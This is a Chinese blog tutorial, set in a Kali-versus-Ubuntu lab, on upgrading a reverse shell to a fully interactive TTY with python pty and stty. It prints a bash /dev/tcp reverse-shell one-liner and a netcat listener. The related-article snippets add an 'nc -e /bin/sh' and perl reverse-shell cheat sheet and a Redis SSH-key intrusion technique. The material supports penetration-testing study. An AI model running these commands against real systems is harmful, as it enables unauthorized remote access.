通过stty将shell升级为完全交互式shell

最新推荐文章于 2024-03-27 22:03:35 发布
最新推荐文章于 2024-03-27 22:03:35 发布
阅读量1k 收藏 3
点赞数
分类专栏: 渗透测试 文章标签: shell 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zlirving_/article/details/108749444
版权

当我们反弹回了一个shell连接,以及通过id命令查看到一个令人满意的用户权限。但凡事总有意外,由于我们获取的shell并不是一个具有完整交互的shell,因此可能会在使用过程中被挂起,甚至还可能会因为我们的操作失误,例如不小心摁下了 “Ctrl-C”键,这将直接终止我们的整个shell进程。

做个小实验

攻击机:kali (10.92.0.73)
靶机:ubuntu (10.92.0.74)
 

简单shell

首先给kali反弹个普通shell
Ubuntu:
bash -i >& /dev/tcp/10.92.0.73/1234 0>&1
Kali:
nc -lvvp 1234
在这里插入图片描述
在这里插入图片描述
这个shell有很多问题,不能满足部分功能
1.无法使用vim等文本编辑器
2.不能补全
3.不能su
4.没有向上箭头使用历史

 

半交互式Shell

对于已经安装了python的系统,我们可以使用python提供的pty模块,只需要一行脚本就可以创建一个原生的终端,命令如下:

python -c 'import pty; pty.spawn("/bin/bash")'

可以运行su命令
在这里插入图片描述
但是还是存在很多问题
1.无法使用vim等文本编辑器
2.不能补全
3.没有向上箭头使用历史
 

完全交互式Shell

通过实验我只通过以下命令就得到了完全交互式shell

# In reverse shell 
$ python -c 'import pty; pty.spawn("/bin/bash")' 
Ctrl-Z

 # In Kali 
$ stty raw -echo 
$ fg 

# In reverse shell 
$ reset

可以使用上下左右,vi,tab补全等等一系列操作,并且按Ctrl-c也不会退出
在这里插入图片描述
 

相关命令解析
stty -echo #禁止回显,当在键盘上输入时,并不出现在屏幕上
stty echo #打开回显
stty raw #设置原始输入
stty -raw #关闭原始输入

bg
将一个在后台暂停的命令,变成继续执行

fg
将后台中的命令调至前台继续运行

jobs
查看当前有多少在后台运行的命令

ctrl + z
可以将一个正在前台执行的命令放到后台,并且暂停

clear
这个命令将会刷新屏幕,本质上只是让终端显示页向后翻了一页,如果向上滚动屏幕还可以看到之前的操作信息。
 
reset
这个命令将完全刷新终端屏幕,之前的终端输入操作信息将都会被清空
参考链接

https://www.freebuf.com/news/142195.html
https://www.jianshu.com/p/e7202cb2c3dd
 
GOT IT!

 
******************************************************
小实验小结,具体测试利用方式需根据具体实践场景~

想冲大厂的癞蛤蟆
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Metasploit中将shell升级为metepreter shell
weixin_43379478的博客
01-03 3379
有时候我们对目标机进行攻击的时候拿到的不一定是metepreter shell,而仅仅是一个普通的conmand shell。 本文提供一个方法能够大概率实现将conmand shell 升级为 metepreter shell. 如果你在shell中,你可以键入Ctrl+z,然后键入y,然后回车,先把shell隐藏到后台。 我们可以从shell中看到,当前session的ID为2。 如果你不在...
BASH」:谈谈如何获取完全交互式终端
binaxin的博客
09-30 899
写在前面,本方法适用于在反弹shell后把shell提升为完全交互式shell,也是自己实战了一段时间后摸索出来的,记一下笔记; 完美的交互式shell python -c 'import pty; pty.spawn("/bin/bash")' Ctrl-Z stty raw -echo fg reset export SHELL=bash //$ export TERM=xterm-256color 同样的,我在网上也找到另外一种方式:script /dev/null/这样:同理,也可以通过同样的.
Girsh:自动生成适用于Linux或Windows受害者的完全交互的反向外壳
03-25
Girsh(Golang交互式反向外壳) 谁不厌倦手动键入几行代码即可将反向shell升级完整交互式反向shelltty生成,stty大小...,stty raw-echo)或键入使用的命令。 描述 使用Girsh,只需运行它,它将检测操作系统并执行正确的命令以将其升级完整交互式反向外壳。 对于Linux: 获取终端的大小 使用python2.7,python3和python生成tty 将终端更改为原始终端 对于Windows: 将下载到与反向Shell服务器相同的机器和相同的端口上 聆听获取ConPTY反向外壳 用法 有两种模式可用: 简单的听众 go run main.go listener -h Usage: girsh listen [flags] Flags: -h, --help help for listen Global Flags: -
交互式shell
st3pby的博客
12-28 3807
交互式shell
linux提权
最新发布
2201_75378806的博客
03-27 535
提取的文件要认真看(.log文件之类的可能有账号密码哦)网站。
linux sh gt tty,如何将简单的Shell转换成为完全交互式TTY
weixin_30522983的博客
05-14 412
原标题:如何将简单的Shell转换成为完全交互式TTY作为一名渗透测试人员,最令人激动的莫过于netcat为我们反弹回了一个shell连接,以及通过id命令查看到一个令人满意的用户权限。但凡事总有意外,由于我们获取的shell并不是一个具有完整交互的shell,因此可能会在使用过程中被挂起,甚至还可能会因为我们的操作失误,例如不小心摁下了 “Ctrl-C”键,这将直接终止我们的整个shell进程...
python3 -c ‘import ptypty.spawn(“/bin/bash“)‘升级切换交互式shell
sweelg的博客
02-28 3534
python3 -c 'import pty;pty.spawn("/bin/bash")' export TERM=xterm Ctrl+Z stty -a stty raw -echo;fg reset stty rows 29 columns 94 row和columns数据为stty -a后的数据
将简单的shell升级完全交互式TTY
weixin_34413357的博客
09-13 1188
本文讲的是将简单的shell升级完全交互式TTY,每个pentester都知道,当用netcat反弹一个反向shell并且看到详细的netcat消息跟输出时,这种感觉爽歪歪。 当然他们也知道shell丢失时的沮丧,运行了一个不好的命令,挂起并且意外地击中“Ctrl-C”,认为它会阻止它,其实是杀死整个连接。 除了没有正确处理SIGINT之外,...
shell免交互与交互
qxdbb的博客
02-14 476
shell免交互与交互 一,Here Document免交互 1.概述 使用I/O重定向的方式将命令列表提供给交互式程序或命令,如cat,read或ftp命令;是标准输入的一种替代品,可以帮助脚本开发人员不必使用临时文件来构建输入信息,而是直接就地生产出一个文件并用作命令的标准输入。 基本语法格式: 命令 <<标记 . . . . . . 标记 注: 1)特殊字符"<<"在标记和命令之前,目的是将命令块的输出重定向到程序或命令的stdin。标记的选择要确保不会出现在其他地方,避免出
反弹Shell升级交互式Shell ——yzddMr6
yzddMr6的博客
12-03 2477
前言 看hack the box的视频的时候,发现ippsec不喜欢用蚁剑,喜欢弹个shell回来。 然后一顿操作把一个简单的shell升级到了一个标准交互式shell 写这篇文章记录一下 正文 攻击机:kali 靶机:ubuntu 首先ubuntu建一个新用户:test,密码 test 普通Shell 给kali弹shell bash -i >& /dev/tcp/192.168...
popen 实现c/s模式shell功能
08-02
目标 完成一个以socket套接字为基础的c/s服务器程序,该程序通过客户端与服务器端连接后,实现一个交互式SHELL的功能。 运行环境: Linux系统。同一主机,ip为本地回环 “127.0.0.1” 需求概述 完成一个以socket套接字为基础的c/s服务器程序,该程序通过客户端与服务器端连接后,实现一个交互式SHELL的功能。 其中服务端用popen来创建子进程执行客户端发出的命令。 同时客户端内也有一个功能基本完整shell程序。 服务器主要功能: 采用多线程架构,每个线程可与客户端连接。通过接受客户端从管道中写入的命令,执行,并将返回结果写入管道由客户端读出。 Server端通过socket套接字接收client 端发出的信息,发送到套接字中的内容包括数据的长度,以及数据的内容。 Server端需要先接收到数据头中的数据长度值,再接收传入命令的具体内容。 收到数据后执行popen函数,将其返回的内容写入到套接字中,同样发送的内容为两次:一,数据长度。二,数据内容。 Server端具有设置client连接上限的功能,当达到上限时,关闭连接套接字,断开与client端的连接。
自动生成适用于Linux或Windows受害者的完全交互的反向外壳-Golang开发
05-26
Girsh(Golang交互式反向外壳)谁不厌倦手动键入几行以将反向外壳升级完整交互式反向器Girsh(Golang交互式反向外壳)谁不厌倦手动键入几行以进行升级将反向shell转换为完全交互式反向shelltty生成,stty大小....
UNIX环境高级编程
03-30
19.6.6 用非交互模式驱动交互式 程序 492 19.7 其他特性 494 19.7.1 打包模式 494 19.7.2 远程模式 494 19.7.3 窗口大小变化 495 19.7.4 信号发生 495 19.8 小结 495 习题 495 附录A 函数原型 497 附录B 其他源代码...
常见反弹shell总结
weixin_45116657的博客
10-21 487
1、nc 发送:nc -e /bin/sh 10.0.0.1 1234 接收:nc -nlvp 1234 2、bashbash -i >& /dev/tcp/10.0.0.1/8080 0>&1 3、perl: perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getp...
获取完美shell
em.....
06-01 651
微信公众号:小惜渗透,欢迎大佬一起交流进步 下面我将边演示边来介绍几种提升shell的方法,我这里面用的Linux虚拟机搭的DVWA靶场上传文件(吐槽一下,在windows上用小皮面板搭建一点问题没有,在Linux上可能因为权限的问题,文件上传那块正常的图片就死活传不上去,后来自己一顿调,本来都想放弃了,结果瞎调调好了)首先我这里用哥斯拉打开命令界面这时候可以通过方向上键回历史记录,但是一些需要交互的命令,如su或者vim都会执行失败,那么我们首先想到的肯定是反弹shell(反弹shell的命令大全,我公众
实现交互式shell的几种方式:python pty 方式、升级nc、socat、script获取pty
闵行小鱼塘
06-04 1万+
当我们拿到一个webshell的时候,我们能够执行一些命令,但是这些命令都是非交互的,也就是说不存在上下文的概念。当我们想使用vim、top等命令时,webshell就无能为力了。 那我们怎么获取一个可交互的webshell呢?
深入浅出理解交互式shell和非交互式shell、登录shell和非登录shell的区别
热门推荐
粥同学的学习笔记
01-24 1万+
首先我们需要把bash理解为一种模式,我们不如把这种模式想象成类似于洋葱一样的结构,我们可以一层一层剥开,也就是说我们可以一层一层的进入子shell。就好比我们进入一栋楼,打开一个房间是一个环境,在当前这个房间我们又看到了一个门,当我们打开这个门的时候,我们就已经进入了新的环境,也就是新的bash中。这牵扯到一个父shell和子shell的问题。  用户登录到Linux系统后,系统将启动一个
Reverse shell升级完全交互式 TTY
weixin_43851945的博客
01-22 3037
Reverse shell升级交互式 TTY 作者: Ikonw 正常来说普通的reverse shell 都有以下的一些缺点 无法使用的文本管理器 比如 VI 没有Tab键自动完成(痛苦啊) 不能用上下方向键 来选择历史记录(每次输错了都要重新打啊) su 无法执行 如果shell卡住的话 按ctrl + c 会直接导致你的shell 死亡 这边我举个例子 可以利用 python 的 p...
Redis未授权访问之ssh免密登录(踩坑)
Zlirving_的博客
06-29 3994
关于Redis漏洞的详解及写shell、getshell的利用请出示门票:传送门 利用原理 利用 Redis 自身的提供的 config 命令,可以进行写文件操作,攻击者可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以直接使用对应的私钥登录目标服务器。 利用 实验场景 Redis服务器(靶机):Ubuntu 16.4 ----- 192.168.101.46 Redis客户机(攻击机):Ubuntu 16.4 ----- 192.168.
通过shell脚本发送1-255到usb串口设备中
05-27
要向 USB 串口设备发送 1-255 的数据,可以使用 shell 脚本中的 for 循环和 stty 命令来实现。 以下是一个示例脚本,可以逐个发送 1-255 到 USB 串口设备: ```shell #!/bin/bash for i in {1..255} do echo -n "$i" > /dev/ttyUSB0 sleep 0.1 done ``` 在上面的脚本中,`{1..255}` 表示从 1 到 255 的数字范围,for 循环会对每个数字进行迭代。`echo -n "$i" > /dev/ttyUSB0` 命令会将当前数字发送到 USB 串口设备 /dev/ttyUSB0 中,`-n` 参数表示不在末尾自动添加换行符。由于串口设备需要一定的时间来处理接收到的数据,因此在每次发送数据后,脚本会使用 `sleep 0.1` 命令暂停 0.1 秒,以确保设备有足够的时间来处理数据。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值